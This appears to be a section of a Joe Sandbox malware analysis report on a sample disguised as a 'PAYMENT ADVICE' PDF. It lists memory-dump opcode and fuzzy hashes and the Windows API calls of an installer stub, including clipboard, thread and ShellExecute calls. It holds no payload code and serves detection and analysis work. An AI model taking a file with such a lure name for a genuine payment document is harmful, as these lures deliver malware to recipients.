                                                                                                                • Opcode ID: e8ce7b2338f3cc4b81a7d30561e3f229a5f2aeb49d181042417f7bcbe9ed94ad
                                                                                                                • Instruction ID: 6d623f27082119c5360cedc81a9e1c5b224c195e755d154352eec5bbbc4432a8
                                                                                                                • Opcode Fuzzy Hash: e8ce7b2338f3cc4b81a7d30561e3f229a5f2aeb49d181042417f7bcbe9ed94ad
                                                                                                                • Instruction Fuzzy Hash: B5C1CFB4E00258CFDB54DFA5C994B9DBBB2BF88304F2080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6179eeb6d821f46efc49ec4c4f9675a525e6bdd9d6d4e4246d6dfa99d51dffc
                                                                                                                • Instruction ID: c32691749868ba249f987063a56f639fe4827ca4e31d3d8c6901ce608cadf515
                                                                                                                • Opcode Fuzzy Hash: d6179eeb6d821f46efc49ec4c4f9675a525e6bdd9d6d4e4246d6dfa99d51dffc
                                                                                                                • Instruction Fuzzy Hash: 72C1C1B4E00258CFEB54DFA5C994B9DBBB2BF89304F1080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f2a5c37de58b725334c14acc703c43430c170a035796c95ad9fe5ed204dbffb6
                                                                                                                • Instruction ID: 130cf476a60b5727ee13f9bea41ecde00e241b21119ad49728837afe07067f73
                                                                                                                • Opcode Fuzzy Hash: f2a5c37de58b725334c14acc703c43430c170a035796c95ad9fe5ed204dbffb6
                                                                                                                • Instruction Fuzzy Hash: B2C1CEB4E00258CFDB55DFA5C994B9DBBB2BF89304F2080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9b77e269fe40d3673f36dc73e790f490942c7d555b617a263914f596ebbb0526
                                                                                                                • Instruction ID: 626391559b08b7b82c8b7a3b56af9d3999fc2b71928916187984eb7dfc9af16b
                                                                                                                • Opcode Fuzzy Hash: 9b77e269fe40d3673f36dc73e790f490942c7d555b617a263914f596ebbb0526
                                                                                                                • Instruction Fuzzy Hash: FBC1CEB4E00258CFDB54DFA5C994B9DBBB2AF89304F2080A9D819BB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3b1d7ab5da88704f0e7a1c6c2e9cb3c3f1c1823e5000417d648e06eba757a958
                                                                                                                • Instruction ID: a7252b8c926e2397fba1df3592185e2dd209b80703f42e4a9ee79bf92ef7d15a
                                                                                                                • Opcode Fuzzy Hash: 3b1d7ab5da88704f0e7a1c6c2e9cb3c3f1c1823e5000417d648e06eba757a958
                                                                                                                • Instruction Fuzzy Hash: 30C1CFB4E00258CFDB55DFA5C994B9DBBB2BF89304F2080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4ab0ffdb8317182e971725c9a25b0c5f2a92b3d5f43a6ba4410ffcb65521ec47
                                                                                                                • Instruction ID: a722c5c8d94be928955aea3064122c2e39b886a386ae2032b4b89e8eddf3009e
                                                                                                                • Opcode Fuzzy Hash: 4ab0ffdb8317182e971725c9a25b0c5f2a92b3d5f43a6ba4410ffcb65521ec47
                                                                                                                • Instruction Fuzzy Hash: A5C1B0B4E00258CFDB54DFA5C994BADBBB2BF89304F1080A9D819AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 393a2a7525305e72e4980bd0336f5bdd179c81aaa5f3a07eb6d479d294dd88d6
                                                                                                                • Instruction ID: 124332d4952e84c06746e9e69ce00847ac0f0b171588c34e6ec1176fffc428ff
                                                                                                                • Opcode Fuzzy Hash: 393a2a7525305e72e4980bd0336f5bdd179c81aaa5f3a07eb6d479d294dd88d6
                                                                                                                • Instruction Fuzzy Hash: BFC1C274E00258CFDB55DFA5C994BADBBB2BF89304F1080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3281d74c3a67f25368b772b64323a58880bbda2923ac2516d5d2f67e7a96084a
                                                                                                                • Instruction ID: d16cd6bb6de2727788228b215746a153586b1e3be053713eeeb275e69a335ccc
                                                                                                                • Opcode Fuzzy Hash: 3281d74c3a67f25368b772b64323a58880bbda2923ac2516d5d2f67e7a96084a
                                                                                                                • Instruction Fuzzy Hash: ECC1CFB4E00258CFDB55DFA5C994B9DBBB2BF89304F2080A9D809AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8ad0bf89d8b97f4c2179f0df8b603b57dd530bdbaf80f02ff6861ef0d76681df
                                                                                                                • Instruction ID: df7c2032c2576a71166b14f05d330059de60f67e40e7687178d23d519788f10a
                                                                                                                • Opcode Fuzzy Hash: 8ad0bf89d8b97f4c2179f0df8b603b57dd530bdbaf80f02ff6861ef0d76681df
                                                                                                                • Instruction Fuzzy Hash: 68C1CFB4E00258CFDB54DFA5C994B9DBBB2BF89305F2080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: caad1cb44c82fb48194d32f2c43f7e653fdd2c2bf41bef1847be34c25021a2fa
                                                                                                                • Instruction ID: ae1523025497c376dc134be9dd09fd2258a6228c2ccdb3ad08a3d4578606f558
                                                                                                                • Opcode Fuzzy Hash: caad1cb44c82fb48194d32f2c43f7e653fdd2c2bf41bef1847be34c25021a2fa
                                                                                                                • Instruction Fuzzy Hash: 13C1BEB4E00258CFDB54DFA5C994B9DBBB2BF89304F2080A9D819AB355DB359A81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1aa6963767f708d2cc92a027395cdd0b5bf84920014ffbe84b555d511631bfb5
                                                                                                                • Instruction ID: dba39b05f7f46832727e22406a68cad3b0fa0742b1f71b9a4d82b4f48552e18a
                                                                                                                • Opcode Fuzzy Hash: 1aa6963767f708d2cc92a027395cdd0b5bf84920014ffbe84b555d511631bfb5
                                                                                                                • Instruction Fuzzy Hash: 6EC1C0B4E00258CFDB14DFA5C994B9DBBB2AF89305F2080A9D409BB355DB34AE81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bcae4ac8047463c60b005c5500bb98e9ca887fcf83a49505750ceafff652b2be
                                                                                                                • Instruction ID: 48d02052e2d65996968414e8f3b3e4430878d1f53def987404064a3cf176fa31
                                                                                                                • Opcode Fuzzy Hash: bcae4ac8047463c60b005c5500bb98e9ca887fcf83a49505750ceafff652b2be
                                                                                                                • Instruction Fuzzy Hash: 92C1C0B4E00258CFDB54DFA5C984B9DBBB2BF89301F2080A9D409AB355DB34AE81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ae96cc137b1ab0dbf2b04499f1e8a431ddfa3042937d94e71fc69ffb7db40abc
                                                                                                                • Instruction ID: c854797005a8aaa994dd11e757de1dec641627cfdd8c2aae5c0613061abd18b8
                                                                                                                • Opcode Fuzzy Hash: ae96cc137b1ab0dbf2b04499f1e8a431ddfa3042937d94e71fc69ffb7db40abc
                                                                                                                • Instruction Fuzzy Hash: D1C1C1B4E00258CFEB54DFA5C984B9DBBB2AF89315F1080A9D409AB355DB35AE81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fd4fc23b6acd3b4157ff9acf5bda0b480da295ec39e71cb631762905c7e609c9
                                                                                                                • Instruction ID: 63915fcfa46c2efcb24710f3cb5d0f0f103cd290e576ee644f7e5e0cdbb9a8c2
                                                                                                                • Opcode Fuzzy Hash: fd4fc23b6acd3b4157ff9acf5bda0b480da295ec39e71cb631762905c7e609c9
                                                                                                                • Instruction Fuzzy Hash: E8C1B1B4E00258CFDB55DFA5C994BADBBB2AF89301F1080A9D409BB355DB34AE81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d08fad15918f9660a94ed8a03eabbbbce3557138f6e449e478e5323035f67134
                                                                                                                • Instruction ID: 085aba94f4c7904a9b03feb7a3e8dd0e0269bfb443226a2db824bd3030d0e83d
                                                                                                                • Opcode Fuzzy Hash: d08fad15918f9660a94ed8a03eabbbbce3557138f6e449e478e5323035f67134
                                                                                                                • Instruction Fuzzy Hash: 80C1CFB4E01258CFDB54DFA5C994B9DBBB2BF89305F2080A9D409AB355DB34AE81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3d6f4917900a24d7c785c2c13b55f4fbe122031dab58cba31221bcf0e5e77387
                                                                                                                • Instruction ID: 6956188d18102b1d75fd8a7cd7303e2691ba9605a90926e9d7a6201243d5edd0
                                                                                                                • Opcode Fuzzy Hash: 3d6f4917900a24d7c785c2c13b55f4fbe122031dab58cba31221bcf0e5e77387
                                                                                                                • Instruction Fuzzy Hash: 19C1B0B4E00258CFDB54DFA5C994B9DBBB2AF88305F2080A9D409BB355DB35AE81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fe50cc8c7625fec1828bb52907722b91d9cc7702ba139db81380f02531ffb593
                                                                                                                • Instruction ID: 7520bb3e442a0ce98cc5a6bf14ac6cd2297aafc2af3e82e0c9f70a01f325b89d
                                                                                                                • Opcode Fuzzy Hash: fe50cc8c7625fec1828bb52907722b91d9cc7702ba139db81380f02531ffb593
                                                                                                                • Instruction Fuzzy Hash: B3C1C0B4E01258CFDB14DFA5C994B9DBBB2BF88311F2080A9D409BB355DB34AA85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1b2d248f646d4442ae93c6db23d3fa5fc83b104b244b3e074edaf34b9b2af37e
                                                                                                                • Instruction ID: 715fe14fc02342b91d1ed7fd3d0301b2000a3bf4b59416571535827195eea305
                                                                                                                • Opcode Fuzzy Hash: 1b2d248f646d4442ae93c6db23d3fa5fc83b104b244b3e074edaf34b9b2af37e
                                                                                                                • Instruction Fuzzy Hash: 42C1C1B4E00258CFDB54DFA5C994B9DBBB2AF89305F1080A9D409AB355DB35AE81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f6c68258ff99a2f5004178bb88307ccfe3cbe1281d89d2abaf6110754cd7730c
                                                                                                                • Instruction ID: a0c2016a53c46e0c0fe2d1717fdd3aea1dfb2fb9b7adbec64f5548f6e8f18518
                                                                                                                • Opcode Fuzzy Hash: f6c68258ff99a2f5004178bb88307ccfe3cbe1281d89d2abaf6110754cd7730c
                                                                                                                • Instruction Fuzzy Hash: 8DD09E75E4421C8ACF21DF99D8802ECF7B4FBDA321F0129E6C14CA7500DB709A908F56
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c10d31130b2194151683eee042d5d3049859692b4bb7b76212b3aaa6f21bf94d
                                                                                                                • Instruction ID: c8f8e78591c0c8c3bf344e1519e4c3151a3aeb6b43e3cd02d133ca6b36bf2147
                                                                                                                • Opcode Fuzzy Hash: c10d31130b2194151683eee042d5d3049859692b4bb7b76212b3aaa6f21bf94d
                                                                                                                • Instruction Fuzzy Hash: E3D06774D442189ACB11DF589C442ECB7B4AB9A311F0129998448A7500D7709A948A56
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                  • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                • CloseClipboard.USER32 ref: 00405676
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                • String ID: {
                                                                                                                • API String ID: 590372296-366298937
                                                                                                                • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 184305955-0
                                                                                                                • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                APIs
                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                • GetSysColor.USER32(?), ref: 00404396
                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                • String ID: -B@$N$open
                                                                                                                • API String ID: 3615053054-1057335957
                                                                                                                • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
